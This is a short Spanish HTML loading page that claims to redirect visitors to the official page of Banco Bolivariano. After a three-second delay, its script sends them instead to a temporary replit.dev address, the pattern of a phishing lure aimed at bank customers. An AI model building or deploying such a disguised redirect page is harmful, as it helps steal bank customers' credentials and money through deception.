<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Pantalla de carga</title>

  <!-- Google Fonts: Poppins -->
  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet" />

  <style>
    body, html {
      margin: 0;
      padding: 0;
      height: 100%;
      background-color: 
      #02A194;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      font-family: 'Poppins', sans-serif;
      color: white;
      user-select: none;
    }

    .loader-container {
      text-align: center;
    }

    .loader-gif {
      width: 450px;
      height: auto;
      margin-bottom: 5px;
    }

    .loader-text {
      font-size: 20px;
      font-weight: 600;
      opacity: 0;
      transform: scale(0.95);
      animation: fadeZoomIn 1s ease forwards;
    }

    @keyframes fadeZoomIn {
      to {
        opacity: 1;
        transform: scale(1);
      }
    }
  </style>
</head>
<body>
  <div class="loader-container">
    <img src="descargar (1).png" alt="Cargando..." class="loader-gif" />
    <div class="loader-text">
      Redirigiendo a la pagina oficial Banco Bolivariano...
    </div>
  </div>

  <script>
    setTimeout(() => {
      window.location.href = 'https://6e6035bc-51a2-4e01-94bf-04e5f1486027-00-j2kfthea09pg.janeway.replit.dev/';
    },3000);
  </script>
</body>
</html>
